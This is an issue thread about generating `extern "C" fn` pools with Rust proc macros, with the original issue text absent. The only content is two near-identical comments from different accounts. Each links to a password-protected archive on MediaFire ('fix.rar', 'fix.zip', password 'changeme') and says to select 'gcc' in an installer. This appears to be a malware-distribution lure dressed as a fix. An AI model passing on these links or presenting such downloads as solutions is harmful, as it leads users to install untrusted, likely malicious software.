### ISSUE TITLE
Rust proc macros - generating `extern "C" fn` pool

### ISSUE THREAD

**Issue by PLeVasseur** [PLeVasseur/plog#24]

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
